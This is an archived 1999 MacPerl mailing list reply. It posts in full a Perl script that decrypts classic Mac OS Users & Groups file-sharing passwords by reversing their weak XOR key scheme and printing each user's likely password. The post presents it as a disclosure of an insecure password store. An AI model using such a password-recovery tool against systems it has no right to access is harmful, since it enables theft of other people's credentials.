[Date Prev][Date Next][Thread Prev][Thread Next] [Search] [Date Index] [Thread Index]

Re: [MacPerl] Are Your File Sharing Passwords Safe?

To: macperl@macperl.org
Subject: Re: [MacPerl] Are Your File Sharing Passwords Safe?
From: Chris Nandor <pudge@pobox.com>
Date: Wed, 14 Jul 1999 17:27:24 -0400
In-Reply-To: <v04020a10b3b2926226fd@[192.168.0.17]>

At 15.16 -0400 1999.07.14, Chris Nandor wrote:
>If you have Mac::Glue installed (and the Users and Groups OSAX), you can
>run this and find out (hint: the answer is "no").
>
>    http://pudge.net/files/macperl/scripts/decrypt_users_and_groups.plx

Since pudge.net could go down any moment now, here is the script.  It isn't
too long, most of the code there is just getting the user names and ID
numbers.

#!perl -w
# decrypt_users_and_groups.plx - decrypt Users & Groups passwords
# by Chris Nandor, pudge@pobox.com, http://pudge.net/
# Wednesday, July 14, 1999
#
# Requirements:
# MacPerl
#   <URL:http://www.macperl.com/>
#
# Users and Groups OSAX
#   <URL:http://hyperarchive.lcs.mit.edu/HyperArchive/Archive
#       /dev/osa/users-and-groups-osax-12b.hqx>
#
# Mac::Glue and cpan-mac
#   <URL:http://www.perl.com/CPAN/authors/id/CNANDOR/>

use Fcntl;
use Mac::Files;
use Mac::Glue ':all';
use POSIX 'isprint';
use strict;

my($f, %u, $u, $t, @k, $g);
$f = $ARGV[0] ||
    FindFolder(kOnSystemDisk, kPreferencesFolderType) .
    ':Users & Groups Data File';
$g = new Mac::Glue 'Finder';

while (1) {
    my $info = $g->get_next_user_info( $u ? (name => $u) : () );
    if (exists $info->{'ID  '}) {
        $u{$info->{pnam}} = $info->{'ID  '};
        $u = $info->{pnam};
    } else {
        last;
    }
}

@k = map ord, qw(s p c g t p r k);
sysopen F, $f, O_RDONLY or die $!;
read F, $t, -s $f;

for my $u (sort {$u{$a} <=> $u{$b}} keys %u) {
    MAIN: while ($t =~ /$u\000?(.{8})/gs) {
        my(@b, $p) = unpack 'C*', $1;
        next if $b[0] == 0;
        for my $i (0 .. $#b) {
            # i think i have the algorithm right, here,
            # it is different than the one encountered
            # on http://www.securityfocus.com/vdb/bottom.html?vid=519
            # first character seems to be XORd with user's ID XOR 1

            my $c = $b[$i] ^ ($i == 0 ? $u{$u} ^ 1 : $b[$i-1]) ^ $k[$i];
            next MAIN if $c != 0 && ! isprint(chr $c);
            $p .= chr $c;
        }
        $p =~ s/\000+$//;
        printf "possible password for '$u': $p\n";
    }
}

BEGIN {
    $Mac::AppleEvents::Simple::AE_GET{UREC} = sub {
        $Mac::AppleEvents::Simple::AE_GET{typeAERecord()}->
            (AECoerceDesc(shift, typeAERecord))
    }
}

__END__

--
Chris Nandor          mailto:pudge@pobox.com         http://pudge.net/
%PGPKey = ('B76E72AD', [1024, '0824090B CE73CA10  1FF77F13 8180B6B6'])


===== Want to unsubscribe from this list?
===== Send mail with body "unsubscribe" to macperl-request@macperl.org

References:
- [MacPerl] Are Your File Sharing Passwords Safe?
  - From: Chris Nandor <pudge@pobox.com>

Prev by Date: Re: [MacPerl] MPPE Mailing list
Next by Date: [MacPerl] What am I not seeing?
Prev by thread: [MacPerl] Are Your File Sharing Passwords Safe?
Next by thread: Re: [MacPerl] test cgi without connection
Navigation: Date Index | Thread Index | Search | Other lists at bumppo.net